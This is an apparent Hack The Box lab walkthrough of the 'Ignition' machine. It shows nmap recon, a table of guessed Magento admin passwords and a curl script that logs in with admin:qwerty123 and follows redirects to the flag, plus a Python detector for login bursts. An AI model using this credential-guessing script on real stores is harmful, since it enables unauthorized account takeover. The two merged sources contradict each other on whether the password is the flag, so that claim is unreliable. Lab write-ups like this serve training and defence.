Ignition
Result: Only port 80 open, nginx 1.14.2, HTTP title shows redirect to http://ignition.htb/. The web server redirects all requests to ignition.htb. Added to /etc/hosts: Browsing to http://ignition.htb/ reveals a Magento 2 storefront. The standard Magento admin...
Scenario
Ignition attack path
Objective
Machine walkthrough focused on evidence, validation, and reusable operator lessons.
Walkthrough flow
- Single service: HTTP on port 80, nginx 1.14.2
- Hostname: ignition.htb (from redirect)
- Application: Magento 2
- Admin panel at /admin - standard Magento path
- Attack path: default/common credentials on admin login
Source coverage
Moderate source coverage
Status: partial. This article is generated from 2 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.
Moderate confidence: the page is useful for review, but it should be treated as partial because the available source material is thinner or less narrative-complete.
- <TARGET>-Ignition/walkthrough.md
- HTB/<TARGET>-Ignition/notes.md
Technical Walkthrough
Ignition - Walkthrough
Machine Info
| Field | Value |
|---|---|
| Name | Ignition |
| IP | <TARGET> |
| OS | Linux |
| Difficulty | Easy (Starting Point) |
| Services | HTTP (nginx 1.14.2) |
| Application | Magento 2 |
Enumeration
Nmap Scan
```bash
nmap -sC -sV <TARGET>
```
Result: Only port 80 open, nginx 1.14.2, HTTP title shows redirect to http://ignition.htb/.
Hostname Resolution
The web server redirects all requests to ignition.htb. Added to /etc/hosts:
```bash
echo '<TARGET> ignition.htb' >> /etc/hosts
```
Web Application
Browsing to http://ignition.htb/ reveals a Magento 2 storefront. The standard Magento admin path /admin is accessible and shows a login form.
Exploitation
Default Credentials
Magento admin panels are commonly deployed with weak passwords. Common credentials were tested against http://ignition.htb/admin:
| Username | Password | Result |
|---|---|---|
| admin | admin | Failed |
| admin | admin123 | Failed |
| admin | qwerty123 | Success (302 to dashboard) |
Login Process
- GET /admin to obtain <secret redacted> cookie and form_key
- POST to /admin with form_key, login[username]=admin, login[password]=qwerty123
- Server responds with 302 redirect to admin dashboard
- Dashboard confirms full admin access
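From the defender's side, the guessing described above appears in the nginx access log as a run of POSTs to the admin path from one client. The detector below is an added example, not part of the original walkthrough; it assumes the nginx "combined" log format, and the function name, threshold, and window are hypothetical choices.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

ADMIN = "/admin"  # admin path as seen on this box; adjust if the front name differs

# nginx "combined" format: ip - user [time] "METHOD path proto" status bytes ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_admin_login_bursts(lines, threshold=3, window=timedelta(seconds=60)):
    """One alert per client sending >= threshold POSTs to the admin path
    within the sliding window. Threshold and window are assumed values."""
    recent = defaultdict(deque)  # ip -> timestamps of login POSTs in window
    alerts = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = m["path"].split("?", 1)[0]
        if path != ADMIN and not path.startswith(ADMIN + "/"):
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:  # drop attempts older than the window
            q.popleft()
        if len(q) >= threshold:
            a = alerts.setdefault(m["ip"], {"ip": m["ip"], "first_seen": q[0]})
            a["attempts"] = a.get("attempts", len(q) - 1) + 1
            # Status of the latest attempt; the walkthrough saw 302 on success.
            a["last_status"] = int(m["status"])
    return list(alerts.values())

# Constructed sample lines (documentation IPs), not taken from the target.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/May/2026:10:00:01 +0000] "GET /admin HTTP/1.1" 200 7095 "-" "curl/8.5.0"',
    '203.0.113.7 - - [05/May/2026:10:00:02 +0000] "POST /admin HTTP/1.1" 200 7201 "-" "curl/8.5.0"',
    '203.0.113.7 - - [05/May/2026:10:00:04 +0000] "POST /admin HTTP/1.1" 200 7201 "-" "curl/8.5.0"',
    '198.51.100.20 - - [05/May/2026:10:00:05 +0000] "POST /admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [05/May/2026:10:00:06 +0000] "POST /admin HTTP/1.1" 302 0 "-" "curl/8.5.0"',
]

if __name__ == "__main__":
    for alert in find_admin_login_bursts(SAMPLE_LOG):
        print(alert)
```

The status codes on the earlier attempts in the sample are illustrative; the burst logic counts POSTs only and does not depend on them.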
Flag
Answer: qwerty123
The flag for this Starting Point machine is the admin password.
Lessons Learned
- Always check for hostname redirects and add to /etc/hosts
- Magento default admin path is /admin
- Common weak passwords (qwerty123) are a frequent HTB pattern for easy boxes
- For Starting Point boxes, the "flag" is often the answer to a specific question (in this case, the password)
Time
- Total solve time: ~5 minutes
- Single vector: default credentials on exposed admin panel
Source-Backed Dossier
The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.
Notes
Scope
- Target: <TARGET> (Ignition)
- OS: Linux
- Difficulty: Easy (Starting Point)
- Attacker (Pwnbox): <TARGET>
- Pwnbox SSH: x08@<TARGET>
- Started: 2026-05-05
- Completed: 2026-05-05
Phase 0: Setup
- Workspace created at <local workspace><TARGET>-Ignition/
- Pwnbox SSH verified: OK
- Target reachable: OK (ping 66.7ms)
- Hostname ignition.htb added to Pwnbox /etc/hosts
Phase 1: Recon
Nmap
- Port 80/tcp - HTTP - nginx 1.14.2
- Redirect to http://ignition.htb/ (hostname required)
- No other ports open
Web Fingerprint
- Magento 2 ecommerce platform
- PHP (<secret redacted> cookie)
- CSP headers reference authorize.net, magentocommerce.com, paypal (standard Magento)
Admin Panel
- /admin returns HTTP 200 (Magento admin login)
- Form fields: form_key, login[username], login[password]
Phase 3: Synthesis
- Single service: HTTP on port 80, nginx 1.14.2
- Hostname: ignition.htb (from redirect)
- Application: Magento 2
- Admin panel at /admin - standard Magento path
- Attack path: default/common credentials on admin login
- Backup: directory fuzzing for other paths, version-specific CVEs
Phase 4: Foothold
- Tested common passwords against admin user
- admin:qwerty123 - 302 redirect to dashboard = SUCCESS
- Logged into Magento Admin Dashboard
Flag
- Flag: <hash redacted>
- Location: Displayed on Magento Admin Dashboard after login
- Dashboard text: "Congratulations, your flag is: <hash redacted>"
- Credentials used: admin:qwerty123
- Note: The password qwerty123 is NOT the flag; the actual flag is the 32-char hex string shown on the dashboard after successful authentication
Command Log
```bash
# Nmap scan
nmap -sC -sV -oN /tmp/ignition_initial.txt <TARGET>

# Add hostname
echo '<TARGET> ignition.htb' | sudo tee -a /etc/hosts

# Check admin panel
curl -s -o /dev/null -w '%{http_code}' http://ignition.htb/admin

# Login attempt (successful)
curl -s -o /dev/null -w '%{http_code} %{redirect_url}' -b $<secret redacted> -c $<secret redacted> \
  -d "form_key=${FK}&login[username]=admin&login[password]=qwerty123" \
  http://ignition.htb/admin
# Result: 302 http://ignition.htb/admin/admin/index/index/key/...

# Flag retrieval - full redirect chain (POST -> 302 -> 302 -> dashboard)
rm -f /tmp/mag_*
curl -s -c /tmp/mag_cookies.txt http://ignition.htb/admin/ > /dev/null
FORM_KEY=$(curl -s -b /tmp/mag_cookies.txt http://ignition.htb/admin/ | grep -oP 'form_key.*?value="\K[^"]+')
REDIR1=$(curl -s -c /tmp/mag_cookies.txt -b /tmp/mag_cookies.txt -X POST "http://ignition.htb/admin/" \
  -d "form_key=${FORM_KEY}&login[username]=admin&login[password]=qwerty123" \
  -D - -o /dev/null | grep -i "^Location:" | awk '{print $2}' | tr -d '\r\n')
REDIR2=$(curl -s -c /tmp/mag_cookies.txt -b /tmp/mag_cookies.txt "$REDIR1" \
  -D - -o /dev/null | grep -i "^Location:" | awk '{print $2}' | tr -d '\r\n')
curl -s -c /tmp/mag_cookies.txt -b /tmp/mag_cookies.txt "$REDIR2" | grep -i "flag"
# Result: "Congratulations, your flag is: <hash redacted>"
```